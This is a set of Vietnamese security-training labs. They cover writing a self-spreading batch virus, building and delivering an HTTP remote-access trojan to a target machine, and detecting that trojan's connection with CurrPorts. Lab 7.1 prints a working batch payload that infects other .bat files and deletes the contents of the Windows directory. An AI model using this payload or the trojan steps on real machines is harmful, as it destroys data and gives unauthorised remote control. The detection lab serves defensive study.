Lab 7.1: Viết chương trình virus đơn giản
Tạo ra một virus là quá trình đơn giản, dù nó còn phụ thuộc vào mục đích của người lập trình. Những lập trình viên chuyên nghiệp thường chọn thiết kế một mã hoàn toàn mới.
Bây giờ chúng ta sẽ tạo ra một virus cơ bản, thực thi hành động khi có xúc tác. Để tạo ra virus, bạn cần có ứng dụng notepad, bat2com hoặc sử dụng GUI based virus.
Viết chương trình virus đơn giản sử dụng notepad:
- Tạo 1 folder mới để chứa file virus
- Mở ứng dụng notepad, copy và paste dòng sau:
@echo off
for %%f in (*.bat) do copy %%f + virus.bat
del c:\windows\*.*- Lưu tệp dưới dạng .bat
- Virus sẽ thực thi nếu click
Biến đổi tệp thành exe sử dụng bat2com utility hay bat to the .exe converter
Bạn có thể đọc thêm: Tự học code virus đầy đủ từ A-Z
Lab 7.2: Tạo HTTP RAT Trojan
Ở lab này, chúng ta sẽ tạo ra một server Trojan truy cập từ xa trên máy Windows 7 sử dụng HTTP RAT Trojan. Khi Trojan được thực thi, máy mục tiêu (Windows Server 2016, địa chỉ IP 10.10.50.211) sẽ tạo ra truy cập từ xa đến máy hacker (Windows 7)
Thiết lập và quy trình
Đến máy Windows 7 và chạy HTTP RAT Trojan đã được tải
- Uncheck thông báo với địa chỉ IP
- Thiết lập port
- Click vào Create
Trong thư mục mặc định chứa ứng dụng đã cài đặt, bạn sẽ thấy một tệp thực thi mới. Gửi tệp này đến máy của nạn nhân (Windows Server 2016)
- Đăng nhập với máy tính nạn nhân (Windows Server 2016) và chạy tệp
- Mở task manager bạn sẽ thấy HTTP Server đang được chạy ngầm
- Trở lại Windows 7, mở trình duyệt web
- Đến địa chỉ IP của máy nạn nhân 10.10.50.211
- Kết nối HTTP được mở trong máy nạn nhân
- Running Processes sẽ hiện những chương trình đang chạy trên máy nạn nhân
- Browse sẽ hiện các drive được kết nối trên máy nạn nhân
- Chọn Drive C sẽ hiện các file và folder trong ổ C
- Computer Info sẽ hiện ra thông tin về máy nạn nhân và phiên đăng nhập
- Stop httpRat để dừng kết nối với máy mục tiêu
- Máy Windows Server 2016 kiểm tra task manager sẽ thấy không còn HTTP Server nữa
Lab 7.3: Quan sát kết nối TCP/IP sử dụng công cụ CurrPort
Dựa vào lab trước, chúng ta sẽ thực thi lại HTTP Remote Access Trojan (RAT) trên Windows Sever 2016 (10.10.50.211) và quan sát kết nối TCP/IP để phát hiện và loại bỏ kết nối
CurrPort là ứng dụng giúp theo dõi kết nối và các port đang được sử dụng trên máy của bạn
- Chạy ứng dụng CurrPort trên Windows Server 2016 và quan sát các chương trình
- Chạy HTTP Trojan
- Chương trình mới được thêm vào danh sách
- Bạn có thể thấy tên chương trình, giao thức, port local và remote cũng như thông tin địa chỉ IP
- Để biết thêm thông tin, chuột phải vào httpserver.exe chọn properties
- Properties đang cho thấy nhiều thông tin hơn về kết nối TCP
- Đến Windows 7 sử dụng trình duyệt web kết nối bình thường
- Trở lại Windows 2016, loại bỏ kết nối của httpserver.exe
- Bây giờ, thử kết nối lại từ Windows 7 sẽ thấy loại bỏ http RAT thành công
